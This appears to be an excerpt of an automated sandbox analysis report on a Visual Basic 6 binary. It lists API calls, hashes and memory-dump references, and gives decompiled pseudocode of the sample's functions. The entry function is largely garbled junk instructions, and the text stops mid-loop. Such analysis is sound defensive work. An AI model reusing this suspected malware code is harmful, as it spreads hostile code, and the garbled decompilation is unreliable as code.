VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3044975c348ba7e1709cefecaa3b27d8a6caa3ba7da224325fc48bbac313fb88
Instruction ID: 2a5cbe144275a7948a04e5195e97130404de4c210d7c97ed22e66e241c17f394
Opcode Fuzzy Hash: 3044975c348ba7e1709cefecaa3b27d8a6caa3ba7da224325fc48bbac313fb88
Instruction Fuzzy Hash: A9412AB2F4E501CBE3545A54A880B307631AB47344FB169BB89073A5D2E27C7943FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040706A, Relevance: 1.4, APIs: 1, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bafdccef0e81e87921d0bbe91d4aa2c41f94e20ece2a315f0ed8980bc867d75b
Instruction ID: 34bde58bf54960ce0071f1965d37bcfb0fd1722b01bbea0ac194d0e557a7e41e
Opcode Fuzzy Hash: bafdccef0e81e87921d0bbe91d4aa2c41f94e20ece2a315f0ed8980bc867d75b
Instruction Fuzzy Hash: C85127B2F4E401CBE3640A50A8807707631AB47344FB169BB89073A6D2E27D7943FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00410D14, Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 271
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00410D14(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v40;
				char _v52;
				void* _v72;
				char _v76;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				intOrPtr _v136;
				char _v144;
				signed int _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr* _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				signed char _t128;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t144;
				signed int _t147;
				signed int _t148;
				signed int _t159;
				signed int _t164;
				char* _t166;
				char* _t169;
				signed int _t174;
				intOrPtr _t182;
				signed int _t187;
				void* _t191;
				void* _t193;
				intOrPtr _t194;
				void* _t195;
				long long* _t196;
				void* _t206;
				long long _t212;
				long long _t213;

				_t194 = _t193 - 0xc;
				 *[fs:0x0] = _t194;
				L004010F0();
				_v16 = _t194;
				_v12 = 0x4010e0;
				_v8 = _a4 & 0x00000001;
				_t128 = _a4 & 0x000000fe;
				_a4 = _t128;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4010f6, _t191);
				_push(5);
				_push(0x403268);
				_push( &_v52);
				L004011EC();
				_t212 =  *0x4010d8;
				L004011E0();
				L004011E6();
				asm("fcomp qword [0x4010d0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t128 != 0) {
					_t174 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
					_v156 = _t174;
					if(_v156 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x6f8);
						_push(0x402f3c);
						_push(_a4);
						_push(_v156);
						L004011DA();
						_v180 = _t174;
					}
				}
				_t136 =  *((intOrPtr*)( *_a4 + 0xa0))(_a4,  &_v148);
				asm("fclex");
				_v156 = _t136;
				if(_v156 >= 0) {
					_v184 = _v184 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x402f0c);
					_push(_a4);
					_push(_v156);
					L004011DA();
					_v184 = _t136;
				}
				_t137 = _v148;
				_v28 = _t137;
				_push(0x40322c);
				L004011D4();
				if(_t137 != 1) {
					L004011CE();
				}
				_push(0x403234);
				_push(0x403240);
				L004011BC();
				L004011C2();
				_push(_t137);
				_push(0x403248);
				L004011BC();
				_t187 = _t137;
				L004011C2();
				_push(_t137);
				L004011C8();
				_v156 =  ~(0 | _t137 != 0x0000ffff);
				_push( &_v80);
				_push( &_v76);
				_push(2);
				L004011B6();
				_t195 = _t194 + 0xc;
				_t140 = _v156;
				if(_t140 != 0) {
					L004011CE();
				}
				_push("5-5");
				_push(0x40325c);
				L004011BC();
				_v88 = _t140;
				_v96 = 8;
				_push( &_v96);
				_push( &_v112); // executed
				L004011AA(); // executed
				_v136 = 5;
				_v144 = 0x8002;
				_push( &_v112);
				_t144 =  &_v144;
				_push(_t144);
				L004011B0();
				_v156 = _t144;
				_push( &_v112);
				_push( &_v96);
				_push(2);
				L004011A4();
				_t196 = _t195 + 0xc;
				_t147 = _v156;
				if(_t147 != 0) {
					_t147 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
					_v156 = _t147;
					if(_v156 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x6f8);
						_push(0x402f3c);
						_push(_a4);
						_push(_v156);
						L004011DA();
						_v188 = _t147;
					}
				}
				_v156 = _v156 & 0x00000000;
				if(_v156 >= 2) {
					L0040119E();
					_v192 = _t147;
				} else {
					_v192 = _v192 & 0x00000000;
				}
				_t148 = _v156;
				asm("fld1");
				 *((long long*)(_v40 + _t148 * 8)) = _t212;
				_v156 = 1;
				_t206 = _v156 - 2;
				if(_t206 >= 0) {
					L0040119E();
					_v196 = _t148;
				} else {
					_v196 = _v196 & 0x00000000;
				}
				_t182 = _v40;
				_t213 =  *0x4010c8;
				 *((long long*)(_t182 + _v156 * 8)) = _t213;
				_v152 =  &_v52;
				_push( &_v152);
				asm("fld1");
				_push(_t182);
				_push(_t182);
				 *_t196 = _t213;
				L00401198();
				L004011E6();
				asm("fcomp qword [0x4010c0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t206 != 0) {
					L004011CE();
				}
				if( *0x412010 != 0) {
					_v200 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x4033f4);
					L00401192();
					_v200 = 0x412010;
				}
				_v164 =  *_v200;
				if( *0x412010 != 0) {
					_v204 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x4033f4);
					L00401192();
					_v204 = 0x412010;
				}
				_v156 =  *_v204;
				_t159 =  *((intOrPtr*)( *_v156 + 0x1b8))(_v156,  &_v148);
				asm("fclex");
				_v160 = _t159;
				if(_v160 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x402f0c);
					_push(_v156);
					_push(_v160);
					L004011DA();
					_v208 = _t159;
				}
				_t164 =  *((intOrPtr*)( *_v164 + 0x1bc))(_v164,  !_v148);
				asm("fclex");
				_v168 = _t164;
				if(_v168 >= 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x402f0c);
					_push(_v164);
					_push(_v168);
					L004011DA();
					_v212 = _t164;
				}
				_v136 = 0x13131313;
				_t188 =  >=  ? 0x406042 : _t187;
				_push( *((intOrPtr*)( >=  ? 0x406042 : _t187))());
				_t166 =  &_v144;
				_push(_t166);
				L0040118C();
				if(_t166 != 0) {
					L004011CE();
				}
				_v8 = 0;
				asm("wait");
				_push(0x4111a1);
				_v152 =  &_v52;
				_t169 =  &_v152;
				_push(_t169);
				_push(0);
				L00401186();
				L00401180();
				return _t169;
			}

0x00410d17
0x00410d26
0x00410d32
0x00410d3a
0x00410d3d
0x00410d4a
0x00410d50
0x00410d52
0x00410d5d
0x00410d60
0x00410d62
0x00410d6a
0x00410d6b
0x00410d70
0x00410d76
0x00410d7b
0x00410d80
0x00410d86
0x00410d88
0x00410d89
0x00410d93
0x00410d99
0x00410da6
0x00410dc8
0x00410da8
0x00410da8
0x00410dad
0x00410db2
0x00410db5
0x00410dbb
0x00410dc0
0x00410dc0
0x00410da6
0x00410dde
0x00410de4
0x00410de6
0x00410df3
0x00410e15
0x00410df5
0x00410df5
0x00410dfa
0x00410dff
0x00410e02
0x00410e08
0x00410e0d
0x00410e0d
0x00410e1c
0x00410e23
0x00410e26
0x00410e2b
0x00410e34
0x00410e36
0x00410e36
0x00410e3b
0x00410e40
0x00410e45
0x00410e4f
0x00410e54
0x00410e55
0x00410e5a
0x00410e5f
0x00410e64
0x00410e69
0x00410e6a
0x00410e7a
0x00410e84
0x00410e88
0x00410e89
0x00410e8b
0x00410e90
0x00410e93
0x00410e9c
0x00410e9e
0x00410e9e
0x00410ea3
0x00410ea8
0x00410ead
0x00410eb2
0x00410eb5
0x00410ebf
0x00410ec3
0x00410ec4
0x00410ec9
0x00410ed3
0x00410ee0
0x00410ee1
0x00410ee7
0x00410ee8
0x00410eed
0x00410ef7
0x00410efb
0x00410efc
0x00410efe
0x00410f03
0x00410f06
0x00410f0f
0x00410f19
0x00410f1f
0x00410f2c
0x00410f4e
0x00410f2e
0x00410f2e
0x00410f33
0x00410f38
0x00410f3b
0x00410f41
0x00410f46
0x00410f46
0x00410f2c
0x00410f55
0x00410f63
0x00410f6e
0x00410f73
0x00410f65
0x00410f65
0x00410f65
0x00410f79
0x00410f82
0x00410f84
0x00410f87
0x00410f91
0x00410f98
0x00410fa3
0x00410fa8
0x00410f9a
0x00410f9a
0x00410f9a
0x00410fb4
0x00410fb7
0x00410fbd
0x00410fc3
0x00410fcf
0x00410fd0
0x00410fd2
0x00410fd3
0x00410fd4
0x00410fd7
0x00410fdc
0x00410fe1
0x00410fe7
0x00410fe9
0x00410fea
0x00410fec
0x00410fec
0x00410ff8
0x00411015
0x00410ffa
0x00410ffa
0x00410fff
0x00411004
0x00411009
0x00411009
0x00411027
0x00411034
0x00411051
0x00411036
0x00411036
0x0041103b
0x00411040
0x00411045
0x00411045
0x00411063
0x0041107e
0x00411084
0x00411086
0x00411093
0x004110b8
0x00411095
0x00411095
0x0041109a
0x0041109f
0x004110a5
0x004110ab
0x004110b0
0x004110b0
0x004110d8
0x004110de
0x004110e0
0x004110ed
0x00411112
0x004110ef
0x004110ef
0x004110f4
0x004110f9
0x004110ff
0x00411105
0x0041110a
0x0041110a
0x00411119
0x0041112b
0x00411130
0x00411131
0x00411137
0x00411138
0x00411142
0x00411144
0x00411144
0x00411149
0x00411150
0x00411151
0x00411184
0x0041118a
0x00411190
0x00411191
0x00411193
0x0041119b
0x004111a0

APIs

__vbaChkstk.MSVBVM60(?,004010F6), ref: 00410D32
__vbaAryConstruct2.MSVBVM60(?,00403268,00000005,?,?,?,?,004010F6), ref: 00410D6B
__vbaFPInt.MSVBVM60(?,00403268,00000005,?,?,?,?,004010F6), ref: 00410D76
__vbaFpR8.MSVBVM60(?,00403268,00000005,?,?,?,?,004010F6), ref: 00410D7B
__vbaHresultCheckObj.MSVBVM60(00000000,004010E0,00402F3C,000006F8), ref: 00410DBB
__vbaHresultCheckObj.MSVBVM60(00000000,004010E0,00402F0C,000000A0), ref: 00410E08
__vbaI2Str.MSVBVM60(0040322C), ref: 00410E2B
__vbaEnd.MSVBVM60(0040322C), ref: 00410E36
__vbaStrCat.MSVBVM60(00403240,00403234,0040322C), ref: 00410E45
__vbaStrMove.MSVBVM60(00403240,00403234,0040322C), ref: 00410E4F
__vbaStrCat.MSVBVM60(00403248,00000000,00403240,00403234,0040322C), ref: 00410E5A
__vbaStrMove.MSVBVM60(00403248,00000000,00403240,00403234,0040322C), ref: 00410E64
__vbaBoolStr.MSVBVM60(00000000,00403248,00000000,00403240,00403234,0040322C), ref: 00410E6A
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00403248,00000000,00403240,00403234,0040322C), ref: 00410E8B
__vbaEnd.MSVBVM60(?,?,004010F6), ref: 00410E9E
__vbaStrCat.MSVBVM60(0040325C,5-5,?,?,004010F6), ref: 00410EAD
#545.MSVBVM60(?,00000008), ref: 00410EC4
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00410EE8
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410EFE
__vbaHresultCheckObj.MSVBVM60(00000000,004010E0,00402F3C,000006F8), ref: 00410F41
__vbaGenerateBoundsError.MSVBVM60 ref: 00410F6E
__vbaGenerateBoundsError.MSVBVM60 ref: 00410FA3
#684.MSVBVM60(?,?,?), ref: 00410FD7
__vbaFpR8.MSVBVM60(?,?,?), ref: 00410FDC
__vbaEnd.MSVBVM60(?,?,?), ref: 00410FEC
__vbaNew2.MSVBVM60(004033F4,00412010,?,?,?), ref: 00411004
__vbaNew2.MSVBVM60(004033F4,00412010,?,?,?,?,?,?,?,?,?,?,?), ref: 00411040
__vbaHresultCheckObj.MSVBVM60(00000000,00000002,00402F0C,000001B8,?,?,?,?,?,?,?,?,?,?,?), ref: 004110AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402F0C,000001BC,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411105
__vbaVarTstLt.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411138
__vbaEnd.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411144
__vbaAryDestruct.MSVBVM60(00000000,?,004111A1,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00411193
__vbaFreeVar.MSVBVM60(00000000,?,004111A1,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041119B

Strings

5-5, xrefs: 00410EA3

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$BoundsErrorGenerateListMoveNew2$#545#684BoolChkstkConstruct2Destruct
String ID: 5-5
API String ID: 4089801122-2876792997
Opcode ID: 2aef838187e88c2e342270ed138b697dc96034ea2a2ecc30a88e658195e12478
Instruction ID: 7707d509227f408367784466f75bcb05b9a5f90a7bd365e0485877eb3a3e39bc
Opcode Fuzzy Hash: 2aef838187e88c2e342270ed138b697dc96034ea2a2ecc30a88e658195e12478
Instruction Fuzzy Hash: 9EC13F709002189EDB20DF61CC46BDD7BB5BF09305F1081EAE60DBA2A1DB785AC5DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040120C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 53%

			_entry_() {
				signed char _t176;
				signed int _t177;
				signed char _t178;
				intOrPtr* _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t197;
				signed char _t272;
				signed char _t278;
				signed char _t284;
				signed char _t290;
				signed char _t296;
				signed char _t302;
				signed char _t308;
				intOrPtr* _t315;
				void* _t316;
				signed char _t323;
				signed char _t329;
				signed char _t335;
				signed char _t341;
				void* _t343;
				signed char _t347;
				signed char _t353;
				signed char _t359;
				void* _t362;
				signed char _t363;
				signed char _t369;
				void* _t373;
				signed char _t375;
				signed char _t380;
				signed char _t386;
				signed char _t391;
				signed char _t397;
				void* _t428;
				intOrPtr* _t441;
				intOrPtr* _t442;
				signed char _t444;
				signed int _t446;
				void* _t451;
				signed int _t454;
				signed int* _t455;
				signed int* _t460;
				intOrPtr* _t461;
				intOrPtr* _t462;
				intOrPtr* _t463;
				intOrPtr* _t464;
				signed int _t465;
				intOrPtr* _t466;
				intOrPtr* _t467;
				intOrPtr* _t470;
				intOrPtr* _t475;
				intOrPtr* _t476;
				intOrPtr* _t478;
				void* _t481;
				intOrPtr* _t485;
				void* _t489;
				intOrPtr* _t490;
				signed int _t491;
				intOrPtr _t496;
				void* _t526;

				_push("VB5!6&*"); // executed
				L00401204(); // executed
				 *_t176 =  *_t176 + _t176;
				 *_t176 =  *_t176 + _t176;
				 *_t176 =  *_t176 + _t176;
				 *_t176 =  *_t176 ^ _t176;
				 *_t176 =  *_t176 + _t176;
				_t177 = _t176 + 1;
				 *_t177 =  *_t177 + _t177;
				 *_t177 =  *_t177 + _t177;
				 *_t177 =  *_t177 + _t177;
				 *((intOrPtr*)(_t177 + 0x3a5e7e9c)) =  *((intOrPtr*)(_t177 + 0x3a5e7e9c)) + _t451;
				_t178 = _t177 & 0xcaac4075;
				_t490 = _t489 - 1;
				asm("cmpsd");
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				 *_t460 =  *_t460 + _t178;
				 *_t178 =  *_t178 + _t178;
				 *_t461 =  *_t461 + _t178;
				_push(es);
				_push(_t178);
				 *_t460 =  *_t460 + 0x50;
				if( *_t460 >= 0) {
					_push(0x65);
					asm("arpl [ecx+esi], si");
					 *_t178 =  *_t178 + _t178;
					 *_t461 =  *_t461 - _t460;
					_t446 = _t178 + _t178 +  *((intOrPtr*)(_t178 + _t178));
					 *_t446 =  *_t446 + _t446;
					asm("int3");
					 *_t446 =  *_t446 ^ _t446;
					asm("out dx, eax");
					_t490 = _t490 - 1;
					_t460 =  *0xa282ecd9;
					asm("sbb ah, [eax-0x68]");
					asm("loop 0xffffffa9");
					asm("retf 0xf39");
					asm("sti");
					 *((intOrPtr*)(_t490 + 0x1fe)) = es;
					_t178 =  *0xcda1847f;
					[tword [edx] = _t526;
					_t465 = _t465 - 1;
					asm("lodsd");
					asm("cdq");
					asm("iretw");
					asm("adc [edi+0xaa000c], esi");
					asm("pushad");
					asm("rcl dword [ebx], cl");
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					asm("invalid");
					 *_t178 =  *_t178 + _t178;
					cs =  *0x2543fe;
				}
				_push(cs);
				 *_t178 =  *_t178 + _t178;
				 *0x61654200 =  *0x61654200 + _t460;
				if( *0x61654200 != 0) {
					L8:
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t460 =  *_t460 + _t178;
					goto L9;
				} else {
					asm("outsd");
					asm("insb");
					asm("popad");
					_t491 =  *(_t490 + 0x6e) * 0xd003573;
					 *_t178 = _t460 +  *_t178;
					_t9 = _t461 + 0x61;
					 *_t9 =  *((intOrPtr*)(_t461 + 0x61)) + _t460;
					_t496 =  *_t9;
					if(_t496 < 0) {
						L9:
						 *_t178 =  *_t178 + _t178;
						 *_t178 =  *_t178 + _t178;
						 *_t178 =  *_t178 + _t178;
						 *_t178 =  *_t178 + _t178;
						 *_t178 =  *_t178 + _t178;
						asm("invalid");
						 *_t178 =  *_t178 + 1;
						_t179 = _t178 + _t178;
						asm("rol al, 0x0");
						_pop(_t454);
						 *((intOrPtr*)(_t179 - 0x5bff7f80)) =  *((intOrPtr*)(_t179 - 0x5bff7f80)) + _t179;
						asm("movsb");
						asm("movsb");
						 *((intOrPtr*)(_t460 - 0x37ff4647)) =  *((intOrPtr*)(_t460 - 0x37ff4647)) + _t454;
						asm("enter 0xc8, 0xd4");
						asm("aam 0xd4");
						asm("sbb al, 0x4f");
						asm("lahf");
						asm("out dx, eax");
						 *((intOrPtr*)(_t465 - 0x70ff1031)) =  *((intOrPtr*)(_t465 - 0x70ff1031)) + _t460;
						asm("iretd");
						asm("out dx, eax");
						 *((intOrPtr*)(_t465 - 0x41)) =  *((intOrPtr*)(_t465 - 0x41)) + _t460;
						asm("out dx, eax");
						 *((intOrPtr*)(_t465 - 0x41)) =  *((intOrPtr*)(_t465 - 0x41)) + _t460;
						asm("out dx, eax");
						 *((intOrPtr*)(_t465 - 0x2bff1031)) =  *((intOrPtr*)(_t465 - 0x2bff1031)) + _t460;
						asm("iretd");
						asm("out dx, eax");
						 *((intOrPtr*)(_t465 + 0xefcf)) =  *((intOrPtr*)(_t465 + 0xefcf)) + _t460;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						do {
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							asm("adc al, 0x0");
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							 *_t179 =  *_t179 + _t179;
							 *_t465 = _t460 +  *_t465;
							if ( *_t465 > 0) goto L14;
							cs =  *_t465;
							_pop(_t466);
							 *_t179 =  *_t179 + _t179;
							asm("movq mm0, [eax]");
							 *_t466 =  *_t466 + _t460;
							_pop(_t467);
							 *_t179 =  *_t179 + _t179;
							asm("maxps xmm0, [eax]");
							 *_t467 =  *_t467 + _t460;
							if ( *_t467 > 0) goto L15;
							 *_t467 =  *_t467 + _t454;
							asm("lahf");
							 *_t179 =  *_t179 + _t179;
							asm("das");
							asm("scasd");
							 *_t179 =  *_t179 + _t179;
							_pop(ds);
							asm("lahf");
							 *_t467 =  *_t467 + _t454;
							asm("outsd");
							asm("fild word [eax]");
							 *_t467 =  *_t467 + _t454;
							_pop( *__eax);
							_pop(ds);
							asm("outsd");
							asm("fild word [eax]");
							asm("outsd");
							_t465 = 0x1f0000ef;
							_pop( *__eax);
							 *0x1f0000ef =  *0x1f0000ef + _t460;
							if ( *0x1f0000ef > 0) goto L16;
							 *0x1f0000ef =  *0x1f0000ef + _t460;
							asm("outsd");
							asm("les eax, [eax]");
							asm("movq [eax], mm0");
							 *0x1f0000ef =  *0x1f0000ef + _t454;
							_pop( *__eax);
							 *0x1F0000AE =  *((intOrPtr*)(0x1f0000ae)) + _t460;
							 *((intOrPtr*)(0x1f0000ae)) =  *((intOrPtr*)(0x1f0000ae)) + _t460;
							asm("out dx, eax");
							 *((intOrPtr*)(0x1f0000ae)) =  *((intOrPtr*)(0x1f0000ae)) + _t460;
							asm("out dx, eax");
							 *((intOrPtr*)(0x9b0004ab)) =  *((intOrPtr*)(0x9b0004ab)) + _t460;
							asm("out dx, eax");
						} while ( *0x9B0004AB >= 0);
						asm("iretd");
						asm("out dx, eax");
						 *0x8E04F0BE =  *((intOrPtr*)(0x8e04f0be)) + _t460;
						asm("out dx, eax");
						 *0xFFFFFFFFEE85F0BE =  *((intOrPtr*)(0xffffffffee85f0be)) + _t460;
						asm("lahf");
						asm("out dx, eax");
						 *0xFFFFFFFF9F8500AE =  *((intOrPtr*)(0xffffffff9f8500ae)) + _t460;
						asm("out dx, eax");
						 *((intOrPtr*)(0xffffffff9f8500ae)) =  *((intOrPtr*)(0xffffffff9f8500ae)) + _t460;
						asm("out dx, eax");
						 *0x0E85F0BE =  *((intOrPtr*)(0xe85f0be)) + _t460;
						asm("out dx, eax");
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *((intOrPtr*)(_t179 + _t179)) =  *((intOrPtr*)(_t179 + _t179)) + _t454;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						 *_t179 =  *_t179 + _t179;
						_t180 = _t179 + _t461;
						 *_t180 =  *_t180 + _t180;
						 *_t180 =  *_t180 + _t180;
						 *_t180 =  *_t180 + _t180;
						 *_t180 =  *_t180 + _t180;
						 *_t180 =  *_t180 + _t180;
						 *_t180 =  *_t180 + _t180;
						 *0xcf8f00ef =  *0xcf8f00ef + _t460;
						_pop(_t470);
						 *_t180 =  *_t180 + _t180;
						asm("maxps xmm0, [eax]");
						 *0xcf8f00ef =  *0xcf8f00ef + _t460;
						asm("outsd");
						 *_t180 =  *_t180 + _t180;
						asm("movq [eax], mm0");
						 *0xcf8f00ef =  *0xcf8f00ef + _t460;
						asm("outsd");
						 *_t180 =  *_t180 + _t180;
						asm("movq [eax], mm0");
						 *0xcf8f00ef =  *0xcf8f00ef + _t460;
						asm("outsd");
						 *_t180 =  *_t180 + _t180;
						_pop(ds);
						_pop( *__eax);
						 *0xcf8f00ef =  *0xcf8f00ef + _t460;
						if ( *0xcf8f00ef > 0) goto L19;
						 *_t470 =  *_t470 + _t454;
						 *0xcf5f0f00 =  *0xcf5f0f00 + _t460;
						asm("adc al, 0xcf");
						 *_t180 =  *_t180 + _t180;
						asm("aas");
						 *_t180 =  *_t180 + _t180;
						asm("movq [esi+0x8f1f00], mm1");
						 *0xbf3f0000 =  *0xbf3f0000 + _t460;
						asm("outsd");
						 *_t180 =  *_t180 + _t180;
						_pop(ds);
						_pop( *__eax);
						 *0xbf3f0000 =  *0xbf3f0000 + _t454;
						asm("lahf");
						 *0xbf3f0000 =  *0xbf3f0000 + _t454;
						asm("outsd");
						asm("fild word [eax]");
						asm("lahf");
						asm("out dx, eax");
						 *0xFFFFFFFF4E3FEFCF =  *((intOrPtr*)(0xffffffff4e3fefcf)) + _t460;
						asm("iretd");
						asm("out dx, eax");
						 *0xFFFFFFFFBF3EFFBF =  *((intOrPtr*)(0xffffffffbf3effbf)) + _t460;
						asm("out dx, eax");
						 *0xFFFFFFFFBF3EFF9F =  *((intOrPtr*)(0xffffffffbf3eff9f)) + _t460;
						asm("out dx, eax");
						 *((intOrPtr*)(0xffffffffbf3eff9f)) =  *((intOrPtr*)(0xffffffffbf3eff9f)) + _t460;
						asm("out dx, eax");
						 *((intOrPtr*)(0xffffffff4e3fefcf)) =  *((intOrPtr*)(0xffffffff4e3fefcf)) + _t460;
						asm("iretd");
						asm("out dx, eax");
						 *((intOrPtr*)(0xffffffffbf3effbf)) =  *((intOrPtr*)(0xffffffffbf3effbf)) + _t460;
						asm("out dx, eax");
						 *((intOrPtr*)(0xffffffffbf3eff9f)) =  *0xFFFFFFFFBF3EFF9E + _t460;
						asm("les eax, [eax]");
						asm("outsd");
						_t474 = 0xcf8f00ef;
						asm("out dx, eax");
						 *0xFFFFFFFFCF8F00AE =  *((intOrPtr*)(0xffffffffcf8f00ae)) + _t460;
						while(1) {
							L22:
							asm("out dx, eax");
							 *_t180 =  *_t180 + _t180;
							 *_t180 =  *_t180 + _t180;
							 *_t180 =  *_t180 + _t180;
							 *_t180 =  *_t180 + _t180;
							_t181 = _t180;
							 *_t490 =  *_t490 + _t454;
							 *_t181 =  *_t181 + _t181;
							 *_t181 =  *_t181 + _t181;
							 *_t181 =  *_t181 + _t181;
							_t180 = _t181;
							 *_t180 =  *_t180 + _t180;
							 *_t490 =  *_t490 + _t180;
							 *_t180 =  *_t180 + _t180;
							while(1) {
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
